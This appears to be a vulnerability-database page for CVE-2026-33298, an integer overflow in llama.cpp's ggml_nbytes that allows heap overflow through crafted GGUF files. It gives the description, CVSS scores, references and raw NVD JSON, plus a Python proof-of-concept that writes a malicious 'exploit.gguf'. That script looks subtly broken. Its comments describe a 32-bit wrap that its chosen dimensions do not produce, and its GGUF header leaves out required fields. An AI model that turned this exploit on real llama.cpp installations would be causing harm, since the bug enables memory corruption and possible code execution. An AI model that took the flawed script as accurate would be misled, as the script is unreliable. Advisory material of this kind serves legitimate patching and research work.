CVE-2026-33298

Description

llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:* - VULNERABLE

llama.cpp < b7824

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-33298: Integer Overflow in llama.cpp ggml_nbytes
# This script demonstrates how to craft a tensor dimension that triggers an overflow.

import struct

def create_malicious_gguf_header():
    # GGUF Magic Number
    magic = b'GGUF'
    version = struct.pack('<I', 3)  # GGUF version 3
    tensor_count = struct.pack('<Q', 1) # 1 Tensor
    
    # Tensor Name
    name_len = struct.pack('<Q', 4)
    name = b'test'
    
    # Tensor Dimensions (n_dims)
    n_dims = struct.pack('<I', 2) # 2 dimensions
    
    # Exploit: Set dimensions such that (dim1 * dim2 * type_size) overflows
    # Assuming type Q4_0 (block size 32 bytes, block count calculated internally)
    # or simply F32 (4 bytes). If we calculate elements = dim1 * dim2.
    # If elements = 0x100000001, and type_size = 4, total = 0x400000004.
    # In 32-bit arithmetic, this wraps to 4.
    
    # Triggering the overflow in ggml_nbytes calculation
    # We want a huge number of elements that wraps to a small size
    dim1 = 0x10000
    dim2 = 0x10000  # Product = 0x100000000
    
    # Pack dimensions
    dims = struct.pack('<Q', dim1) + struct.pack('<Q', dim2)
    
    # Tensor Type (e.g., F32 = 0)
    tensor_type = struct.pack('<I', 0) 
    
    # Offset to tensor data (arbitrary for PoC)
    offset = struct.pack('<Q', 1024)
    
    # Constructing a minimal malicious structure (Simplified)
    payload = magic + version + tensor_count + name_len + name + n_dims + dims + tensor_type + offset
    
    print("[+] Malicious GGUF structure generated.")
    print("[+] Dimensions: {} x {}".format(dim1, dim2))
    print("[+] Attempting to save to 'exploit.gguf'...")
    
    with open('exploit.gguf', 'wb') as f:
        f.write(payload)
    
    print("[+] File saved. Load this in a vulnerable llama.cpp version to trigger the crash.")

if __name__ == "__main__":
    create_malicious_gguf_header()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33298
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33298
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33298/
[4] VulDB https://vuldb.com/cve/CVE-2026-33298
[5] https://github.com/ggml-org/llama.cpp/releases/tag/b7824
[6] https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33298", "sourceIdentifier": "[email protected]", "published": "2026-03-24T01:17:01.870", "lastModified": "2026-04-30T17:01:02.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix."}, {"lang": "es", "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. Antes de b7824, una vulnerabilidad de desbordamiento de entero en la función `ggml_nbytes` permite a un atacante eludir la validación de memoria al crear un archivo GGUF con dimensiones de tensor específicas. Esto hace que `ggml_nbytes` devuelva un tamaño significativamente menor al requerido (por ejemplo, 4MB en lugar de Exabytes), lo que lleva a un desbordamiento de búfer basado en montículo cuando la aplicación procesa posteriormente el tensor. Esta vulnerabilidad permite una posible ejecución remota de código (RCE) a través de corrupción de memoria. b7824 contiene una corrección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*", "versionEndExcluding": "b7824", "matchCriteriaId": "471181FC-F68E-43C2-AC26-06D790AEE75F"}]}]}], "references": [{"url": "https://github.com/ggml-org/llama.cpp/releases/tag/b7824", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}